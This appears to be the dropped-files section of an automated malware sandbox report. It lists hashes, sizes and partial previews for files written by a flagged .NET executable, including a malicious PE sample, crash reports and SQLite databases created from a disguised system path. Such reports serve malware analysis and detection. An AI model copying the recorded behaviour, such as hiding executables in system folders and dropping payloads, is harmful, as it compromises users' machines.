                                                            MD5:F8BE8A9DA35C2581F98F5D142EAC4F50
                                                            SHA1:FCD5014F3D8E902333C0172EE1753F4F626F6D13
                                                            SHA-256:2D5F76C1140AE1A9683494D7E0BCE9B43858A7A6090A62F53553742AEF84153D
                                                            SHA-512:2150E2322927820DEB48526CAC243A5BA301C4662701409DEDC22885555EA576E98427127E4BE2FAC677255F8DCCFB084EF69FD428E3AAA04E9567C469A048A4
                                                            Malicious:false
                                                            Preview:yN59YwLZR5akbwxsSt3ITyiT0XKtkjGbmHOLnVeG16JlACn7jPeW6noApmJAlcyry98UimE7OxQXo6SyuMKVEuf8cNgBMdeZHbxBDSZ6LgIJWRVsTUQYSdnEeA1UFDvuS1PMJRubxNJilWlK2yr1NFGoysgDaF1HuX0fCIjCjylETFcIYrcRV4hMukYavrAsVCxOfGItOpRYeBUtPXptmkw00nubuIR2y2tRSOnRjtCqmIrsQpKXCQFvP6X1Wq8GYYkmSCaBuXK3hGNr6BKE740hx7CV1v52u6SOiFaOOJmoGLNJsp5Uf4IdiCzUAFK9cRJlx9I0l60yRMalu2nLzkX0yyqgQFOJ9mMyCmVtgEsjDTLVlNkHc8J14Tw9Tmkgrqzp9mjHg3ou1ywemU4CeGrAdU4szWZ4eM1XegW9odliUY9GhRX9shBl9zMor0RKeuQp6ZAF84XAfJpEVyLh9aL6KQXpUrSyMaEkIUJHRRAxJBF0JHT2ptLDiTeqBVuQmjyEFF5ApDQrZYxJKhfMXZIcPACzzcG6guKkMAvEMSNlcdnKgUgezi2NaVyECGKN7UKpNM7JwbAFMg9wX1Sf6mG817J0LrBFIAoIS76TXWrYhxB3VCqKxpQUNLyPCG8FZ57M21da59Hj4rbD6PeJA0RctU4GJrQQYm9l0yBejQPyiraguuTxmyEinech6WROs0LSszNHO9kukd3C3YWYXdojha8VWdhM8BFrfHx4hLimOT7KkaoiA20OMmuS11vucXvjXMgwlb0M4BUOcxu5z9MGL1f3XfCpZyK1hYxY426iBnULRgzEG04cLpXgrnYFYLwG0dqDAWB7CnEihUl1p8ij3sq1BRrRd1J00NUy0wEuz7Zhlz9XBhaamMMIwyCtoteLeNrT9xA34yu6SIQMRUP5atOnBLBBtUGFcNDYIpXOghfycPzni0bUdivu8DSxv9JjrpdEF1Dm7BZ3Oa
                                                            Process:C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):691200
                                                            Entropy (8bit):5.5554988350478975
                                                            Encrypted:false
                                                            SSDEEP:12288:C9X1yJ7/pZY7fiCI/YBfULiXPrQfkXmm1RhdLB9XFy+nM6D+:CVc7EaCQYBfcE1ZM6D+
                                                            MD5:314420BAC969BCFB9510A0E8CC3686D6
                                                            SHA1:66F1D0A60A2727970476A105C88883F37270E30F
                                                            SHA-256:38B9CC3CCAE02C270E3D62E62E3B3B40E90AD7F898372B8A5035445BA32F4B26
                                                            SHA-512:DEBF908ADD95AA0849451AEF830E5E71724247D352DCB5DAD6B02DCA0D54E4E915A9430DE80D970A4E7EF3749EB2FC7C6FA7839348D84F546D5934D713E7569C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 74%
                                                            Joe Sandbox View:
                                                            • Filename: 2VaAObAYLP.exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. ..............................R.....@.....................................S.......p............................................................................ ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc..............................@..B.......................H.......T...d...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                            Process:C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe
                                                            File Type:ASCII text, with very long lines (927), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):927
                                                            Entropy (8bit):5.922086725578787
                                                            Encrypted:false
                                                            SSDEEP:24:zGvam+Hi8Z+bdjeWdF//seRhvCSKmEGRxR:z2BGC/RhImP
                                                            MD5:45A6AB332CBE2104C5CF8ED1E9758946
                                                            SHA1:D56D1775D0ED159216579FEE94BC907805FAF074
                                                            SHA-256:04901FA552EFA2BA7711B0447E338F185CAA891CF6748AE321F8536695A40E99
                                                            SHA-512:B2200C9A87204978AE6169D4B48C7278073EBCEB06A677F39B2D6CF9F99C53830350880C1B0D7F37BC4A5A6D6174ADD833810DBBD0E7A9A912C3C816E809E4E5
                                                            Malicious:false
                                                            Preview:i9gqhBiUW0APzwGU3hvr7G0ktybskkzjOmUzalaoW3WzwkrWTsn4EM7cI56tj0tvAbBMbR4SHHUEtAyJGFY265fCp2qeoqFgJlyUif4CyVx613tHHxmdb1zF59hjlZnaCy4IMdkkLWDlIiKvJiX1ElESwtYj8UbYrW4D8k5oMBSFxN7XyvaCCwWatmWcEAm04o4vnHwimsoCS8eiwBvM4YW4AeTWOdjMZcLJTLtr82ZTITIuHxpCPa6fS9uJxaTJJcnzxVOkSEOB8CvqVjObxh79gp1Tbj3ijQKqqS7wiFuKL4hPNDxOL2VlfoTIe4JsKqcr2F9Dlc2rwwxlIlGXwpWq5iLC8zSn6C9fczXIEumt9nzs0s92yv6fTvwT36EwJOvuwRJSO7TBCmqRtdLQzazLFeMqCDOHp0kv2E5jirn0c4cqEfkauy6tZkoRFcQKtMVMC5YohmrIw8sLCflgdxW130WSZoeGadHPiQoJH53IGy7a1dPk1ur50eSMjGO2IlrT0dmw0cZi4NuF35a6Y4OqvMZE7ckAqAAfGokY0dtYUIBmtNSnpSeOWBhoDiyY2Y23NP8PVCG5KzVmLwVuJ6VXgvIFG5URoUg6QHZdODSmLiDgq4cQNEP5CeWbG3IZsyQ0SZWDX1gGosM7slYLdDEkFl3vv7XU423WRMNRiZ3WiIRTSYtee66ptqvrfkSadLLwzzqfXHnDKsC6UjdWO2085Onlbgv7Gc2W7eecsNHWT2fBnyX6G6MlVN0lMED1Wp7rzp8zEAnAvdoDsl7nIz0KQRBuo3QoKPAn5xL8zi1FTL01iw2kHasgywainOKLu80fcBH4a9xk8v0EaJL1BphugeyIXmUlXqVUVUZgp7KHmIiD5WIdCSJFbG98N8hxoMMSZgsGupMEeZHY5uMAe0iFgQ2PVbT
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.6572720812093972
                                                            Encrypted:false
                                                            SSDEEP:192:CbJXTKrFcD7Y0BU/nZajhzuiFRZ24IO8vKOC:O9HDfBU/AjhzuiFRY4IO8vG
                                                            MD5:666A0B3CD7D2DFBBAC03171FE7B37DEB
                                                            SHA1:80B894C8612403441A8329D537AE2842FD2466F7
                                                            SHA-256:DBA856A99D9AB673631B800F0E74C85B5EC371962D3FF5E56D7360D278CD91B8
                                                            SHA-512:DCEABD6684A74CF45D54AE095618377B10D4B5116479DFBA247B5D8C534C186CD7855D7355F33C2594690A1E08F243AB4A3A907169CE80972A2837BF04087D04
                                                            Malicious:true
                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.2.8.5.9.7.9.3.7.7.7.1.4.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.2.8.5.9.7.9.8.1.5.2.1.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.4.7.9.7.7.5.-.2.4.4.e.-.4.f.b.e.-.9.1.0.c.-.f.c.e.a.0.d.0.5.8.8.1.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.c.f.3.c.2.0.-.e.4.3.6.-.4.e.0.0.-.b.2.c.a.-.1.6.2.6.9.2.5.b.0.8.5.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.K.y.C.6.h.V.w.U.8.Z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.2.0.-.0.0.0.1.-.0.0.1.4.-.5.d.f.6.-.3.b.2.f.c.d.4.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.0.6.e.c.e.1.0.5.0.9.9.0.e.d.c.c.7.f.f.f.7.c.5.3.4.a.9.8.6.8.c.0.0.0.0.f.f.f.f.!.0.0.0.0.7.e.8.6.6.0.d.2.4.8.1.0.1.4.b.d.f.8.4.8.1.4.2.7.3.5.7.3.b.9.2.1.2.0.2.c.6.7.e.6.!.K.y.C.6.h.V.w.U.8.Z...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 14 streams, Tue Dec 10 06:32:59 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):32066
                                                            Entropy (8bit):1.783407744539864
                                                            Encrypted:false
                                                            SSDEEP:96:5S8jwjodkAzFz0sPqGi77DvrJYZ9oYtnyyvkRAePWIFWIspFIwO0auisGv:LjAoXPqGOynyycaeyvO00s
                                                            MD5:040D87934B373493D8603849DD1BA326
                                                            SHA1:80BEB0A209AEC862BB2C772C6FA495B9F33451BD
                                                            SHA-256:EE8F24D109107102860E034F669D06F55995CBCC5C304DB8EE8680C667099F91
                                                            SHA-512:911A26DE90032BF9C8D79CF80E73A5016B83400B8621376D7ECF11F841B5C3E2CE24ACBE58838B4D15942046113BC0CC2311191409934AE04E830D6A593619CC
                                                            Malicious:false
                                                            Preview:MDMP..a..... .........Wg........................d...........................T.......8...........T...............Br......................................................................................................eJ..............GenuineIntel............T....... ...Q.WgD............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8410
                                                            Entropy (8bit):3.7026825595695203
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJYhF6Bo6YEIkSUEXgmfg/kpr789bn4xsfAPtm:R6lXJM6u6YErSUUgmfu9n4qfA4
                                                            MD5:BAAC4B8FE4142C6F8ADC9FF206C27C2C
                                                            SHA1:3B9937EB25667B5AEA89325FE3E10733DD6C8452
                                                            SHA-256:FA533B0A3C8E4089AB897A4C43F0B961EBC91462A352ACA8616F914777D7B671
                                                            SHA-512:B73B067FDC459CDA1F991FA2A06483B041DA30468CAFC1DF8C80453B9A916C6DDCA5B9E1ED70585D70C7682B22A162900AB2643F4D02A0BD411941501ADE5CD3
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.7.6.<./.P.i.
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4720
                                                            Entropy (8bit):4.496018834665285
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsEJg77aI9vEWpW8VYbYm8M4J4OJFdm+q8vmOHDSGV5Qd:uIjfCI7Nd7VPJ4DKmU9V5Qd
                                                            MD5:8C8B3BA692DF4D969675BA38B3230DD6
                                                            SHA1:7329DD321D5B0823EA326E7B34287864B4301FDC
                                                            SHA-256:1876457FB40FE09589F49F0E8B8C81171F4A38DEF80A9FF0AB14F9008987B3F5
                                                            SHA-512:4A982EF1D412C0E9495BF8199093A04D1E2DC0496B53C23C2484DB53326876124ABA152EC8B5791F046308E6478A32354390B03BE34CE1E3160A355682FF727F
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="624815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                            Process:C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1613
                                                            Entropy (8bit):5.370675888495854
                                                            Encrypted:false
                                                            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktGqZ4x
                                                            MD5:CFCC907668E9B1AED46D457F77536393
                                                            SHA1:5FD7371DBA3004E2BC1A83BA5C8AD4BD90FC2D28
                                                            SHA-256:414415C15FF1C315E383F642F353A36B24005E012073C05CC72A71173D6604CF
                                                            SHA-512:405A279EA079FAF8C38926EE256DEB2A4541C9752836C5BDE3E435A3437A3E95F086B1A4911BF19440341011771D46E1B1364C5FECEB21277EC0683367DFA4AE
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5712781801655107
                                                            Encrypted:false
                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
